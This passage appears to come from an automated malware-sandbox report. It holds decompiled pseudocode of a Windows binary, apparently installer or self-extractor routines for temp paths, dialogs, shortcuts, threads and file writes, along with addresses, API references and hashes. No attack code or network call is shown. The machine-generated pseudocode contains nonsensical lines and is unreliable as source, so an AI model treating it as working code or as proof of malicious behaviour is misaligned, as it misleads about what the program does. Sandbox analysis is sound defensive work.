															}
														}
														__esi = E00BC33F3(__edi);
														__eax = __ebp - 0x103c;
														__eflags = __esi - 0x7ff;
														__esi = 0x800;
														if(__eflags < 0) {
															__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, __edi, 0x800);
														}
														goto L63;
													}
													L52:
													__eflags =  *((short*)(__edi + 2)) - 0x3a;
													if( *((short*)(__edi + 2)) == 0x3a) {
														goto L62;
													}
													goto L53;
												}
												L47:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
												if( *((intOrPtr*)(__edi + 2)) != __cx) {
													goto L50;
												}
												L48:
												__edi = __edi + 4;
												__ebx = 0;
												__eflags =  *__edi - __bx;
												if( *__edi == __bx) {
													goto L162;
												} else {
													__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, 0x800);
													goto L63;
												}
											}
										case 4:
											L68:
											__eflags =  *0xbe946c - 1;
											__eflags = __eax - 0xbe946c;
											 *__edi =  *__edi + __ecx;
											__eflags =  *(__ebx + 6) & __bl;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										case 5:
											L73:
											__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
											__ecx = 0;
											__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
											__eflags = __eax;
											if(__eax == 0) {
												L80:
												 *0xbe7442 = __cl;
												 *0xbe7443 = 1;
												goto L162;
											}
											L74:
											__eax = __eax - 0x30;
											__eflags = __eax;
											if(__eax == 0) {
												L78:
												 *0xbe7442 = __cl;
												L79:
												 *0xbe7443 = __cl;
												goto L162;
											}
											L75:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												goto L80;
											}
											L76:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax != 0) {
												goto L162;
											}
											L77:
											 *0xbe7442 = 1;
											goto L79;
										case 6:
											L86:
											__eflags = __ebx - 4;
											if(__ebx != 4) {
												goto L90;
											}
											L87:
											__eax = __ebp - 0x5c84;
											__eax = E00BC3429(__ebp - 0x5c84, __eax, L"<>");
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												goto L90;
											}
											L88:
											_push(__edi);
											goto L89;
										case 7:
											L94:
											__eflags = __ebx - 1;
											if(__eflags != 0) {
												L111:
												__eflags = __ebx - 7;
												if(__ebx == 7) {
													__eflags =  *0xbe946c;
													if( *0xbe946c == 0) {
														 *0xbe946c = 2;
													}
													 *0xbe8468 = 1;
												}
												goto L162;
											}
											L95:
											__eax = __ebp - 0x7c84;
											__edi = 0x800;
											GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
											E00BAB147(__eflags, __ebp - 0x7c84, 0x800) = 0;
											__esi = 0;
											_push(0);
											while(1) {
												L97:
												_push( *0xbdd5f8);
												__ebp - 0x7c84 = E00BA3FD6(0xbe846a, __edi, L"%s%s%u", __ebp - 0x7c84);
												__eax = E00BAA0C0(0xbe846a);
												__eflags = __al;
												if(__al == 0) {
													break;
												}
												L96:
												__esi =  &(__esi->i);
												__eflags = __esi;
												_push(__esi);
											}
											L98:
											__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xbe846a);
											__eflags =  *(__ebp - 0x5c84);
											if( *(__ebp - 0x5c84) == 0) {
												goto L162;
											}
											L99:
											__eflags =  *0xbf5b72;
											if( *0xbf5b72 != 0) {
												goto L162;
											}
											L100:
											__eax = 0;
											 *(__ebp - 0x143c) = __ax;
											__eax = __ebp - 0x5c84;
											_push(0x2c);
											_push(__ebp - 0x5c84);
											__eax = E00BC1438(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												L107:
												__eflags =  *(__ebp - 0x143c);
												if( *(__ebp - 0x143c) == 0) {
													__ebp - 0x1bc8c = __ebp - 0x5c84;
													E00BAFD96(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
													__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
												}
												__ebp - 0x5c84 = E00BBA472(__ebp - 0x5c84);
												__eax = 0;
												 *(__ebp - 0x4c84) = __ax;
												__ebp - 0x143c = __ebp - 0x5c84;
												__eax = E00BB9EB3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
												__eflags = __eax - 6;
												if(__eax == 6) {
													goto L162;
												} else {
													L110:
													__eax = 0;
													__eflags = 0;
													 *0xbe7447 = 1;
													 *0xbe846a = __ax;
													__eax = EndDialog( *(__ebp + 8), 1);
													goto L111;
												}
											}
											L101:
											__edx = 0;
											__esi = 0;
											__eflags =  *(__ebp - 0x5c84) - __dx;
											if( *(__ebp - 0x5c84) == __dx) {
												goto L107;
											}
											L102:
											__ecx = 0;
											__eax = __ebp - 0x5c84;
											while(1) {
												L103:
												__eflags =  *__eax - 0x40;
												if( *__eax == 0x40) {
													break;
												}
												L104:
												__esi =  &(__esi->i);
												__eax = __ebp - 0x5c84;
												__ecx = __esi + __esi;
												__eax = __ebp - 0x5c84 + __ecx;
												__eflags =  *__eax - __dx;
												if( *__eax != __dx) {
													continue;
												}
												L105:
												goto L107;
											}
											L106:
											__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
											__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
											__eax = 0;
											__eflags = 0;
											 *(__ebp + __esi * 2 - 0x5c84) = __ax;
											goto L107;
										case 8:
											L115:
											__eflags = __ebx - 3;
											if(__ebx == 3) {
												__eflags =  *(__ebp - 0x5c84) - __di;
												if(__eflags != 0) {
													__eax = __ebp - 0x5c84;
													_push(__ebp - 0x5c84);
													__eax = E00BC6F4C(__ebx, __edi);
													_pop(__ecx);
													 *0xbfdc8c = __eax;
												}
												__eax = __ebp + 0xc;
												_push(__ebp + 0xc);
												 *0xbfdc88 = E00BBAAEA(__ecx, __edx, __eflags);
											}
											 *0xbf5b73 = 1;
											goto L162;
										case 9:
											L120:
											__eflags = __ebx - 5;
											if(__ebx != 5) {
												L90:
												 *0xbfdc90 = 1;
												goto L162;
											}
											L121:
											_push(1);
											L89:
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											_push( *(__ebp + 8));
											__eax = E00BBCC9F(__ebp);
											goto L90;
										case 0xa:
											goto L0;
										case 0xb:
											L160:
											__eflags = __ebx - 7;
											if(__ebx == 7) {
												 *0xbe9470 = 1;
											}
											goto L162;
										case 0xc:
											L81:
											__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
											__eax = E00BC6280( *(__ebp - 0x5c84) & 0x0000ffff);
											__eflags = __eax - 0x46;
											if(__eax == 0x46) {
												 *0xbe7444 = 1;
											} else {
												__eflags = __eax - 0x55;
												if(__eax == 0x55) {
													 *0xbe7445 = 1;
												} else {
													__eax = 0;
													 *0xbe7444 = __al;
													 *0xbe7445 = __al;
												}
											}
											goto L162;
										case 0xd:
											L91:
											 *0xbfdc91 = 1;
											__eax = __eax + 0xbfdc91;
											_t102 = __esi + 0x39;
											 *_t102 =  *(__esi + 0x39) + __esp;
											__eflags =  *_t102;
											__ebp = 0xffffa37c;
											if( *_t102 != 0) {
												_t104 = __ebp - 0x5c84; // 0xffff46f8
												__eax = _t104;
												_push(_t104);
												 *0xbdd5fc = E00BB16F4();
											}
											goto L162;
									}
									L2:
									_t208 = E00BBA647(_t208, _t275);
									_t275 = _t275 + 0x2000;
									_t272 = _t272 - 1;
									if(_t272 != 0) {
										goto L2;
									} else {
										_t276 = _t272;
										goto L4;
									}
								}
								L163:
								 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0xc));
								return _t207;
							}
							goto L157;
						}
					}
					goto L162;
				}
			}

0x00bbc5a1
0x00bbc5a1
0x00bbc5a1
0x00bbc5a1
0x00bbc5a4
0x00000000
0x00000000
0x00bbc5aa
0x00bbc5aa
0x00bbc5ac
0x00bbc5b3
0x00bbc5bb
0x00bbc5c1
0x00bbc5c6
0x00bbc5c9
0x00bbc5fe
0x00bbc603
0x00bbc609
0x00bbc60a
0x00bbc60f
0x00bbc5cb
0x00bbc5cb
0x00bbc5ce
0x00bbc5d4
0x00bbc5ea
0x00bbc5ef
0x00bbc5f0
0x00bbc5f5
0x00bbc5d6
0x00bbc5d6
0x00bbc5db
0x00bbc5dc
0x00bbc5e1
0x00bbc5e1
0x00bbc5d4
0x00bbc616
0x00bbc618
0x00bbc61f
0x00bbc62d
0x00bbc634
0x00bbc639
0x00bbc63a
0x00bbc63d
0x00bbc63e
0x00bbc645
0x00bbc68e
0x00bbc695
0x00bbc69a
0x00bbc69c
0x00000000
0x00000000
0x00bbc6a2
0x00bbc6a2
0x00bbc6a4
0x00bbc6aa
0x00bbc6b1
0x00000000
0x00000000
0x00bbc6b3
0x00bbc6b5
0x00bbc6b6
0x00bbc6b6
0x00bbc6b6
0x00bbc6b9
0x00bbc6bc
0x00bbc6c6
0x00bbc6c6
0x00bbc6c8
0x00bbc6ca
0x00bbc6d4
0x00bbc6d9
0x00bbc6db
0x00bbc719
0x00bbc719
0x00bbc71c
0x00bbc71e
0x00bbc71f
0x00bbc71f
0x00000000
0x00bbc71f
0x00bbc6dd
0x00bbc6df
0x00bbc6e0
0x00bbc6e2
0x00bbc6e5
0x00bbc6fa
0x00bbc6fc
0x00bbc6fd
0x00bbc6fd
0x00bbc6fd
0x00bbc700
0x00bbc700
0x00bbc705
0x00bbc706
0x00bbc70c
0x00bbc70d
0x00bbc712
0x00bbc713
0x00bbc714
0x00000000
0x00bbc714
0x00bbc6e7
0x00bbc6e7
0x00bbc6ee
0x00bbc6f1
0x00bbc6f2
0x00000000
0x00bbc6f2
0x00bbc6be
0x00bbc6c0
0x00bbc6c1
0x00bbc6c4
0x00000000
0x00000000
0x00000000
0x00bbc721
0x00bbc721
0x00bbc724
0x00bbc724
0x00bbc729
0x00bbc72b
0x00bbc72d
0x00bbc72d
0x00bbc72f
0x00bbc72f
0x00000000
0x00bbc647
0x00bbc647
0x00bbc64e
0x00bbc65a
0x00bbc660
0x00bbc661
0x00bbc662
0x00bbc667
0x00bbc66a
0x00bbc66c
0x00bbc672
0x00bbc674
0x00bbc682
0x00bbc687
0x00bbc688
0x00bbc688
0x00bbc732
0x00bbc732
0x00bbc73a
0x00bbc73f
0x00bbc749
0x00bbc750
0x00bbc750
0x00bbc75d
0x00bbc764
0x00bbc769
0x00bbc771
0x00bbc77d
0x00bbc77d
0x00bbc78a
0x00bbc78f
0x00bbc797
0x00bbc7a1
0x00bbc7ae
0x00bbc7b5
0x00bbc7b5
0x00bbc7c1
0x00bbc7c8
0x00bbc7cd
0x00bbc7d5
0x00bbc7db
0x00bbc7dc
0x00bbc7dd
0x00bbc7df
0x00bbc7df
0x00bbc7f4
0x00bbc7f9
0x00bbc805
0x00bbc807
0x00bbc818
0x00bbc825
0x00000000
0x00bbc809
0x00bbc809
0x00bbc814
0x00bbc816
0x00bbc82a
0x00bbc82c
0x00bbc832
0x00bbc838
0x00bbc846
0x00bbc84b
0x00bbc84c
0x00bbc854
0x00bbc859
0x00bbc860
0x00bbc866
0x00bbc868
0x00bbc86e
0x00bbc874
0x00bbc876
0x00bbc87f
0x00bbc882
0x00bbc884
0x00bbc88d
0x00bbc890
0x00bbc896
0x00bbc899
0x00bbc8a2
0x00bbc8b1
0x00bbc8b6
0x00bbc8be
0x00bbc8c1
0x00bbc8cf
0x00bbc8cf
0x00bbc8e3
0x00bbc8e3
0x00bbc8e3
0x00bbc8e8
0x00bbc8ec
0x00bbc8f0
0x00bbc8f7
0x00bbc8fe
0x00bbc901
0x00bbc906
0x00bbc909
0x00bbc90e
0x00bbbd8b
0x00bbbd91
0x00bbbd97
0x00bbbd97
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbbdac
0x00bbbdc3
0x00bbbdc7
0x00000000
0x00bbbdc9
0x00000000
0x00bbbdc9
0x00bbbdc7
0x00bbbdce
0x00bbbdd1
0x00000000
0x00000000
0x00bbbdd7
0x00bbbdd7
0x00000000
0x00bbbdde
0x00bbbdde
0x00bbbde1
0x00bbbdf4
0x00bbbe1a
0x00bbbe2e
0x00bbbe31
0x00bbbe3c
0x00bbbf80
0x00bbbf80
0x00bbbf80
0x00bbbf88
0x00bbbf8e
0x00bbbf93
0x00bbbf95
0x00000000
0x00000000
0x00bbbe46
0x00bbbe4e
0x00bbbe54
0x00bbbe5a
0x00bbbf00
0x00bbbf07
0x00bbbf0d
0x00bbbf10
0x00000000
0x00000000
0x00bbbf12
0x00bbbf19
0x00bbbf1f
0x00bbbf21
0x00000000
0x00bbbf23
0x00bbbf23
0x00bbbf25
0x00bbbf26
0x00bbbf2a
0x00bbbf3e
0x00bbbf43
0x00bbbf4d
0x00bbbf53
0x00bbbf56
0x00bbbf28
0x00bbbf28
0x00bbbf29
0x00000000
0x00bbbf58
0x00bbbf66
0x00bbbf6c
0x00bbbf6e
0x00bbbf7a
0x00bbbf7a
0x00000000
0x00bbbf6e
0x00bbbf56
0x00bbbf21
0x00bbbe60
0x00bbbe6f
0x00bbbe7c
0x00bbbe8d
0x00bbbe90
0x00bbbe93
0x00bbbea6
0x00bbbead
0x00bbbeb2
0x00bbbeb4
0x00000000
0x00000000
0x00bbbeba
0x00bbbec1
0x00bbbec6
0x00bbbecb
0x00bbbed7
0x00bbbedc
0x00bbbedf
0x00bbbee6
0x00bbbee8
0x00bbbee9
0x00bbbef3
0x00bbbef9
0x00bbbefa
0x00000000
0x00bbbefa
0x00bbbe95
0x00bbbe9c
0x00bbbea2
0x00bbbea4
0x00000000
0x00000000
0x00000000
0x00bbbea4
0x00bbbf9b
0x00bbbf9b
0x00bbbfa5
0x00bbbfa5
0x00000000
0x00000000
0x00bbbfaf
0x00bbbfaf
0x00bbbfb1
0x00bbc004
0x00bbc009
0x00bbc012
0x00bbc013
0x00bbc019
0x00bbc01e
0x00bbc021
0x00bbc023
0x00bbc025
0x00bbc02a
0x00bbc02c
0x00bbc02e
0x00bbc02e
0x00bbc030
0x00bbc030
0x00bbc035
0x00bbc03a
0x00bbc03b
0x00bbc03b
0x00bbc03c
0x00bbc03e
0x00bbc045
0x00bbc04a
0x00bbc03e
0x00000000
0x00000000
0x00bbc050
0x00bbc050
0x00bbc052
0x00bbc062
0x00bbc062
0x00000000
0x00000000
0x00bbc06d
0x00bbc06d
0x00bbc06f
0x00000000
0x00000000
0x00bbc075
0x00bbc075
0x00bbc07c
0x00000000
0x00000000
0x00bbc082
0x00bbc082
0x00bbc084
0x00bbc08a
0x00bbc08c
0x00bbc093
0x00bbc094
0x00bbc09b
0x00bbc09d
0x00bbc09d
0x00bbc0a4
0x00bbc0a9
0x00bbc0af
0x00bbc0b1
0x00000000
0x00bbc0b7
0x00bbc0b7
0x00bbc0b7
0x00bbc0ba
0x00bbc0bc
0x00bbc0bd
0x00bbc0c0
0x00bbc0e9
0x00bbc0e9
0x00bbc0ec
0x00bbc1d1
0x00bbc1da
0x00bbc1df
0x00bbc1df
0x00bbc1e1
0x00bbc1e1
0x00bbc1e3
0x00bbc1e5
0x00bbc1ec
0x00bbc1f1
0x00bbc1f2
0x00bbc1f3
0x00bbc1f5
0x00bbc1f7
0x00bbc1fb
0x00bbc1fd
0x00bbc1fd
0x00bbc1ff
0x00bbc1ff
0x00bbc1fb
0x00bbc203
0x00bbc209
0x00bbc216
0x00bbc21d
0x00bbc22d
0x00bbc237
0x00bbc245
0x00bbc24b
0x00bbc253
0x00bbc258
0x00bbc259
0x00bbc25a
0x00bbc25c
0x00bbc270
0x00bbc270
0x00000000
0x00bbc25c
0x00bbc0f2
0x00bbc0f2
0x00bbc0f5
0x00bbc102
0x00bbc102
0x00bbc105
0x00bbc107
0x00bbc108
0x00bbc10a
0x00bbc10b
0x00bbc110
0x00bbc115
0x00bbc11b
0x00bbc11d
0x00bbc11f
0x00bbc122
0x00bbc129
0x00bbc12a
0x00bbc130
0x00bbc131
0x00bbc134
0x00bbc135
0x00bbc136
0x00bbc13b
0x00bbc13e
0x00bbc144
0x00bbc14d
0x00bbc150
0x00bbc155
0x00bbc157
0x00bbc159
0x00bbc15b
0x00bbc15b
0x00bbc15d
0x00bbc15d
0x00bbc15f
0x00bbc15f
0x00bbc167
0x00bbc16e
0x00bbc170
0x00bbc177
0x00bbc17d
0x00bbc17f
0x00bbc180
0x00bbc188
0x00bbc197
0x00bbc197
0x00bbc188
0x00bbc1a2
0x00bbc1a4
0x00bbc1b3
0x00bbc1b9
0x00bbc1bf
0x00bbc1ca
0x00bbc1ca
0x00000000
0x00bbc1bf
0x00bbc0f7
0x00bbc0f7
0x00bbc0fc
0x00000000
0x00000000
0x00000000
0x00bbc0fc
0x00bbc0c2
0x00bbc0c2
0x00bbc0c6
0x00000000
0x00000000
0x00bbc0c8
0x00bbc0c8
0x00bbc0cb
0x00bbc0cd
0x00bbc0d0
0x00000000
0x00bbc0d6
0x00bbc0df
0x00000000
0x00bbc0df
0x00bbc0d0
0x00000000
0x00bbc27b
0x00bbc27b
0x00bbc27c
0x00bbc281
0x00bbc283
0x00bbc286
0x00bbc286
0x00000000
0x00bbc2bc
0x00bbc2bc
0x00bbc2c3
0x00bbc2c5
0x00bbc2c5
0x00bbc2c7
0x00bbc2f6
0x00bbc2f6
0x00bbc2fc
0x00000000
0x00bbc2fc
0x00bbc2c9
0x00bbc2c9
0x00bbc2c9
0x00bbc2cc
0x00bbc2e5
0x00bbc2e5
0x00bbc2eb
0x00bbc2eb
0x00000000
0x00bbc2eb
0x00bbc2ce
0x00bbc2ce
0x00bbc2ce
0x00bbc2d1
0x00000000
0x00000000
0x00bbc2d3
0x00bbc2d3
0x00bbc2d3
0x00bbc2d6
0x00000000
0x00000000
0x00bbc2dc
0x00bbc2dc
0x00000000
0x00000000
0x00bbc349
0x00bbc349
0x00bbc34c
0x00000000
0x00000000
0x00bbc34e
0x00bbc34e
0x00bbc35a
0x00bbc35f
0x00bbc360
0x00bbc361
0x00bbc363
0x00000000
0x00000000
0x00bbc365
0x00bbc365
0x00000000
0x00000000
0x00bbc3ab
0x00bbc3ab
0x00bbc3ae
0x00bbc52f
0x00bbc52f
0x00bbc532
0x00bbc538
0x00bbc53f
0x00bbc541
0x00bbc541
0x00bbc54b
0x00bbc54b
0x00000000
0x00bbc532
0x00bbc3b4
0x00bbc3b4
0x00bbc3ba
0x00bbc3c8
0x00bbc3d4
0x00bbc3d6
0x00bbc3d8
0x00bbc3dd
0x00bbc3dd
0x00bbc3dd
0x00bbc3f5
0x00bbc402
0x00bbc407
0x00bbc409
0x00000000
0x00000000
0x00bbc3db
0x00bbc3db
0x00bbc3db
0x00bbc3dc
0x00bbc3dc
0x00bbc40b
0x00bbc415
0x00bbc41b
0x00bbc423
0x00000000
0x00000000
0x00bbc429
0x00bbc429
0x00bbc430
0x00000000
0x00000000
0x00bbc436
0x00bbc436
0x00bbc438
0x00bbc43f
0x00bbc445
0x00bbc447
0x00bbc448
0x00bbc44d
0x00bbc44e
0x00bbc44f
0x00bbc451
0x00bbc4a5
0x00bbc4a5
0x00bbc4ad
0x00bbc4bb
0x00bbc4cc
0x00bbc4da
0x00bbc4da
0x00bbc4e6
0x00bbc4eb
0x00bbc4ed
0x00bbc4fd
0x00bbc507
0x00bbc50c
0x00bbc50f
0x00000000
0x00bbc515
0x00bbc515
0x00bbc51a
0x00bbc51a
0x00bbc51c
0x00bbc523
0x00bbc529
0x00000000
0x00bbc529
0x00bbc50f
0x00bbc453
0x00bbc453
0x00bbc455
0x00bbc457
0x00bbc45e
0x00000000
0x00000000
0x00bbc460
0x00bbc460
0x00bbc462
0x00bbc468
0x00bbc468
0x00bbc468
0x00bbc46c
0x00000000
0x00000000
0x00bbc46e
0x00bbc46e
0x00bbc46f
0x00bbc475
0x00bbc478
0x00bbc47a
0x00bbc47d
0x00000000
0x00000000
0x00bbc47f
0x00000000
0x00bbc47f
0x00bbc481
0x00bbc48c
0x00bbc496
0x00bbc49b
0x00bbc49b
0x00bbc49d
0x00000000
0x00000000
0x00bbc557
0x00bbc557
0x00bbc55a
0x00bbc55c
0x00bbc563
0x00bbc565
0x00bbc56b
0x00bbc56c
0x00bbc571
0x00bbc572
0x00bbc572
0x00bbc577
0x00bbc57a
0x00bbc580
0x00bbc580
0x00bbc585
0x00000000
0x00000000
0x00bbc591
0x00bbc591
0x00bbc594
0x00bbc375
0x00bbc375
0x00000000
0x00bbc375
0x00bbc59a
0x00bbc59a
0x00bbc366
0x00bbc366
0x00bbc36c
0x00bbc36d
0x00bbc370
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbc8d7
0x00bbc8d7
0x00bbc8da
0x00bbc8dc
0x00bbc8dc
0x00000000
0x00000000
0x00bbc308
0x00bbc308
0x00bbc310
0x00bbc316
0x00bbc319
0x00bbc33d
0x00bbc31b
0x00bbc31b
0x00bbc31e
0x00bbc331
0x00bbc320
0x00bbc320
0x00bbc322
0x00bbc327
0x00bbc327
0x00bbc31e
0x00000000
0x00000000
0x00bbc381
0x00bbc381
0x00bbc382
0x00bbc387
0x00bbc387
0x00bbc387
0x00bbc38a
0x00bbc38f
0x00bbc395
0x00bbc395
0x00bbc39b
0x00bbc3a1
0x00bbc3a1
0x00000000
0x00000000
0x00bbbd98
0x00bbbd9a
0x00bbbd9f
0x00bbbda5
0x00bbbda8
0x00000000
0x00bbbdaa
0x00bbbdaa
0x00000000
0x00bbbdaa
0x00bbbda8
0x00bbc914
0x00bbc91a
0x00bbc924
0x00bbc924
0x00000000
0x00bbc816
0x00bbc807
0x00000000
0x00bbc645

APIs

_wcschr.LIBVCRUNTIME ref: 00BBC662
SHChangeNotify.SHELL32(00001000,00000005,00000000), ref: 00BBC8CF

Strings

.lnk, xrefs: 00BBC809, 00BBC819

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ChangeNotify_wcschr
String ID: .lnk
API String ID: 668186972-24824748
Opcode ID: 3d14d9dfce62fea84890f67fe054a19517b8f0c3c5da3a8d7fcc16f79889c34b
Instruction ID: 1798339768caf4a7ab07be7b724303f5ae0e864924a73d27b994bfea0a981d16
Opcode Fuzzy Hash: 3d14d9dfce62fea84890f67fe054a19517b8f0c3c5da3a8d7fcc16f79889c34b
Instruction Fuzzy Hash: 4091CB72944219AAEF25EAA4CC85EEEB3FCEB04300F1085E6F545E7141EF749B848F65

Uniqueness

Uniqueness Score: -1.00%

Function 00BB07E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00BB07E7() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xbdff50 > 0) {
					_t18 = 0xbdff54;
					do {
						_t7 = CreateThread(0, 0x10000, E00BB0930, 0xbdff50, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xbdff50);
							E00BA6E21(E00BC2DC0(E00BA6E26(0xbdff50)), 0xbdff50, 0xbdff50, 2);
						}
						 *_t18 = _t22;
						 *0x00BE0054 =  *((intOrPtr*)(0xbe0054)) + 1;
						_t8 =  *0xbe71d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xbdff50);
					return _t8;
				}
				return _t5;
			}

0x00bb07ec
0x00bb07f0
0x00bb07f4
0x00bb07f7
0x00bb080b
0x00bb0811
0x00bb0815
0x00bb0817
0x00bb081c
0x00bb0839
0x00bb0839
0x00bb083e
0x00bb0840
0x00bb0846
0x00bb084d
0x00bb0852
0x00bb0852
0x00bb0858
0x00bb0859
0x00bb085c
0x00000000
0x00bb0861
0x00bb0865

APIs

CreateThread.KERNELBASE ref: 00BB080B
SetThreadPriority.KERNEL32(?,00000000), ref: 00BB0852

Part of subcall function 00BA6E26: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6E44

Strings

CreateThread failed, xrefs: 00BB0817

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 1b0eaf9bde18932073c0607089e8c27a40818d8ee9c7db9e67078a919a10150b
Instruction ID: 00e572309d04ba57db8055f7ed6313e36506cb05e307c1b8249ee57b6aee0155
Opcode Fuzzy Hash: 1b0eaf9bde18932073c0607089e8c27a40818d8ee9c7db9e67078a919a10150b
Instruction Fuzzy Hash: C80126B62493026BD6206F54EC81FB7B7D9EB51711F1000BFF68256380DEE0A840C620

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9E6F Relevance: 4.6, APIs: 3, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00BA9E6F(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x14)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x1e;
									if(E00BA6DAD(0xbdff50, _t49 + 0x1e, 0) == 0) {
										E00BA6FF6(0xbdff50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0xbd2260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0xbd2260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}

0x00ba9e6f
0x00ba9e73
0x00ba9e77
0x00ba9e7b
0x00ba9e88
0x00ba9e92
0x00ba9e92
0x00ba9e97
0x00ba9e9c
0x00ba9e9c
0x00ba9ea5
0x00ba9eaa
0x00ba9ef8
0x00ba9f01
0x00ba9f03
0x00ba9f05
0x00ba9f09
0x00ba9f0b
0x00ba9f7e
0x00ba9f83
0x00000000
0x00ba9f87
0x00ba9f0d
0x00ba9f11
0x00000000
0x00ba9f19
0x00ba9f1b
0x00ba9f2b
0x00ba9f79
0x00000000
0x00ba9f79
0x00000000
0x00ba9f2b
0x00ba9f11
0x00ba9eac
